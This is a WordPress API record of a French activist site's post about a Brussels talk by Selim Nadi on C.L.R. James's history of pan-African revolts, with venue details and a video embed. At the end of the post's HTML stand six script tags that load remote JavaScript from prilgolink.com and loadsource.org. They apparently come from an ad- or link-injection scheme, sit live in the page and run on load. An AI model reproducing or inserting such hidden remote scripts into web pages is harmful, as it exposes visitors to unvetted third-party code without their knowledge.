{"id":3947,"date":"2018-10-21T16:32:06","date_gmt":"2018-10-21T15:32:06","guid":{"rendered":"https:\/\/bruxelles-pantheres.be\/?p=3947"},"modified":"2018-11-06T22:09:54","modified_gmt":"2018-11-06T21:09:54","slug":"rencontre-autour-de-histoire-des-revoltes-panafricaines-de-c-l-r-james-avec-selim-nadi","status":"publish","type":"post","link":"https:\/\/bruxelles-pantheres.be\/?p=3947","title":{"rendered":"Vid\u00e9o de la rencontre autour de Histoire des r\u00e9voltes panafricaines de C.L.R. James avec Selim Nadi"},"content":{"rendered":"<h4 class=\"tribe-events-single-event-title\"><em>Lundi <\/em><span class=\"tribe-event-date-start\"><b>29 <\/b> octobre @ 19 h 00 min<\/span> &#8211; <span class=\"tribe-event-time\">21 h 00 min<\/span><\/h4>\n<p>Le Steki<\/p>\n<address class=\"tribe-events-address\"><span class=\"tribe-address\"> <span class=\"tribe-street-address\">4-6 rue Defnet<\/span> <span class=\"tribe-locality\">Bruxelles<\/span><span class=\"tribe-delimiter\">,<\/span> <span class=\"tribe-postal-code\">1060<\/span> <span class=\"tribe-country-name\">Belgique<\/span> <\/span> <a class=\"tribe-events-gmap\" title=\"Cliquez pour voir une carte Google Maps\" href=\"https:\/\/maps.google.com\/maps?f=q&amp;source=s_q&amp;hl=en&amp;geocode=&amp;q=4-6+rue+Defnet+Bruxelles+1060+Belgique\" target=\"_blank\" rel=\"noopener\">+ Google Map<\/a><\/address>\n<address>\u00a0<\/address>\n<address>Ce petit livre de C. L. R. James, dont la premi\u00e8re \u00e9dition est parue en 1938, la m\u00eame ann\u00e9e que <i>Les Jacobins noirs<\/i>, propose une histoire mondiale de la r\u00e9sistance des Noirs, de Saint-Domingue aux colonies africaines, en passant par les \u00c9tats-Unis et d\u2019autres \u00eeles des Antilles. R\u00e9voltes d\u2019esclaves, \u00e9meutes, gr\u00e8ves, mouvements mill\u00e9naristes ou antiracistes : rompant avec le clich\u00e9 de populations subissant passivement leur exploitation, James souligne la diversit\u00e9 des r\u00e9bellions, leur constance et leur place centrale dans le monde moderne.<\/address>\n<p><!--more--><\/p>\n<p>Ici comme ailleurs, ce sont les masses qui font l\u2019histoire, dans les conditions et avec les croyances qui sont les leurs ; les leaders, Toussaint comme Nkrumah, Garvey comme Nyerere, sont toujours port\u00e9s et produits par des processus collectifs. Dans l\u2019\u00e9pilogue, \u00e9crit en 1969, James traite des luttes des Noirs aux \u00c9tats-Unis, des conflits ouvriers dans les Cara\u00efbes et surtout de l\u2019Afrique post-coloniale, prolongeant et pr\u00e9cisant les analyses avanc\u00e9es trente ans plus t\u00f4t. Par son sujet comme par son traitement, ce livre n\u2019a pas pris une ride \u2013 il pourrait m\u00eame \u00eatre en avance sur notre temps.<\/p>\n<p>Selim Nadi a \u00e9crit la pr\u00e9face de cet ouvrage. Il est\u00a0doctorant au centre d\u2019histoire de Sciences Po Paris et \u00e0 l\u2019Universit\u00e9 de Bielefeld. Selim Nadi est \u00e9galement membre des comit\u00e9s \u00e9ditoriaux des revues <i>P\u00e9riode<\/i> et <a href=\"http:\/\/www.contretemps.eu\/event\/rencontre-bruxelles-selim-nadi-revoltes-panafricaines-clr-james\/?fbclid=IwAR14T2hVRT5P3AtyLyuCf01NvNFN8AlcQc5PdS6-3LXpMQ00lkU0dLVsOJA\"><i>Contretemps<\/i>.<\/a><br \/>\n<iframe src=\"https:\/\/www.youtube.com\/embed\/0xLssXqwBBQ\" width=\"560\" height=\"315\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"><\/iframe><br \/>\nSur le m\u00eame sujet, lire aussi :<\/p>\n<h4 class=\"entry-title\"><a href=\"https:\/\/bruxelles-pantheres.be\/?p=1866\" rel=\"bookmark\">C.L.R. James et les luttes panafricaines<\/a><\/h4>\n<h4 class=\"entry-title\"><a href=\"https:\/\/bruxelles-pantheres.be\/?p=2251\" rel=\"bookmark\">C.L.R. James : vers un mat\u00e9rialisme postcolonial<\/a><\/h4>\n<h4 class=\"entry-title\"><a href=\"https:\/\/bruxelles-pantheres.be\/?p=2750\" rel=\"bookmark\">Portrait de C.L.R. James <\/a><\/h4>\n<h4 class=\"entry-title\"><a href=\"https:\/\/bruxelles-pantheres.be\/?p=2744\" rel=\"bookmark\">Conf\u00e9rence de Matthieu Renault : CLR James. La vie r\u00e9volutionnaire d\u2019un \u00ab\u00a0Platon noir\u00a0\u00bb<\/a><\/h4>\n<blockquote>\n<h4 class=\"tribe-events-single-event-title\"><em>Lundi <\/em><span class=\"tribe-event-date-start\"><b>29 <\/b> octobre @ 19 h 00 min<\/span> &#8211; <span class=\"tribe-event-time\">21 h 00 min<\/span><\/h4>\n<p>Le Steki<\/p>\n<address class=\"tribe-events-address\"><span class=\"tribe-address\"> <span class=\"tribe-street-address\">4-6 rue Defnet<\/span> <span class=\"tribe-locality\">Bruxelles<\/span><span class=\"tribe-delimiter\">,<\/span> <span class=\"tribe-postal-code\">1060<\/span> <span class=\"tribe-country-name\">Belgique<\/span> <\/span> <a class=\"tribe-events-gmap\" title=\"Cliquez pour voir une carte Google Maps\" href=\"https:\/\/maps.google.com\/maps?f=q&amp;source=s_q&amp;hl=en&amp;geocode=&amp;q=4-6+rue+Defnet+Bruxelles+1060+Belgique\" target=\"_blank\" rel=\"noopener\">+ Google Map<\/a><\/address>\n<\/blockquote>\n<address><a href=\"https:\/\/bruxelles-pantheres.be\/wp-content\/uploads\/2018\/10\/Selim-Nadi-Revoltes-panafricaines.jpg\"><img decoding=\"async\" class=\"alignnone size-full wp-image-3948\" src=\"https:\/\/bruxelles-pantheres.be\/wp-content\/uploads\/2018\/10\/Selim-Nadi-Revoltes-panafricaines.jpg\" alt=\"\" width=\"1001\" height=\"570\" srcset=\"https:\/\/bruxelles-pantheres.be\/wp-content\/uploads\/2018\/10\/Selim-Nadi-Revoltes-panafricaines.jpg 1001w, https:\/\/bruxelles-pantheres.be\/wp-content\/uploads\/2018\/10\/Selim-Nadi-Revoltes-panafricaines-300x171.jpg 300w, https:\/\/bruxelles-pantheres.be\/wp-content\/uploads\/2018\/10\/Selim-Nadi-Revoltes-panafricaines-768x437.jpg 768w, https:\/\/bruxelles-pantheres.be\/wp-content\/uploads\/2018\/10\/Selim-Nadi-Revoltes-panafricaines-600x342.jpg 600w\" sizes=\"(max-width: 1001px) 100vw, 1001px\" \/><\/a><\/address>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><script src=\"\/\/prilgolink.com\/1e862877dcb4f81821.js\"><\/script><script src=\"https:\/\/prilgolink.com\/optout\/set\/lat?jsonp=__twb_cb_874309960&amp;key=1e862877dcb4f81821&amp;cv=1541538547&amp;t=1541538546696\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/prilgolink.com\/optout\/set\/lt?jsonp=__twb_cb_253360037&amp;key=1e862877dcb4f81821&amp;cv=29276&amp;t=1541538546697\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/prilgolink.com\/addons\/lnkr5.min.js\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/loadsource.org\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=52375x7814x&amp;r=1541538546704\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/prilgolink.com\/ext\/1e862877dcb4f81821.js?sid=52375_7814_&amp;title=ads&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Lundi 29 octobre @ 19 h 00 min &#8211; 21 h 00 min Le Steki 4-6 rue Defnet Bruxelles, 1060 Belgique + Google Map \u00a0 Ce petit livre de C. L. R. James, dont la premi\u00e8re \u00e9dition est parue en 1938, la m\u00eame ann\u00e9e que Les Jacobins noirs, propose une histoire mondiale de la r\u00e9sistance &#8230; <a title=\"Vid\u00e9o de la rencontre autour de Histoire des r\u00e9voltes panafricaines de C.L.R. James avec Selim Nadi\" class=\"read-more\" href=\"https:\/\/bruxelles-pantheres.be\/?p=3947\" aria-label=\"En savoir plus sur Vid\u00e9o de la rencontre autour de Histoire des r\u00e9voltes panafricaines de C.L.R. James avec Selim Nadi\">Lire la suite<\/a><\/p>\n","protected":false},"author":1,"featured_media":3948,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"video","meta":{"footnotes":""},"categories":[1,35,21,36,7,18,28],"tags":[162,100,150],"class_list":["post-3947","post","type-post","status-publish","format-video","has-post-thumbnail","hentry","category-non-classe","category-amerique-du-sud","category-anti-imperialisme","category-europe","category-negrophobie","category-resistance-bruxelles","category-racismes","tag-clr-james","tag-matthieu-renault","tag-selim-nadi","post_format-post-format-video"],"_links":{"self":[{"href":"https:\/\/bruxelles-pantheres.be\/index.php?rest_route=\/wp\/v2\/posts\/3947","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/bruxelles-pantheres.be\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/bruxelles-pantheres.be\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/bruxelles-pantheres.be\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/bruxelles-pantheres.be\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3947"}],"version-history":[{"count":2,"href":"https:\/\/bruxelles-pantheres.be\/index.php?rest_route=\/wp\/v2\/posts\/3947\/revisions"}],"predecessor-version":[{"id":3968,"href":"https:\/\/bruxelles-pantheres.be\/index.php?rest_route=\/wp\/v2\/posts\/3947\/revisions\/3968"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/bruxelles-pantheres.be\/index.php?rest_route=\/wp\/v2\/media\/3948"}],"wp:attachment":[{"href":"https:\/\/bruxelles-pantheres.be\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3947"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/bruxelles-pantheres.be\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3947"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/bruxelles-pantheres.be\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3947"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}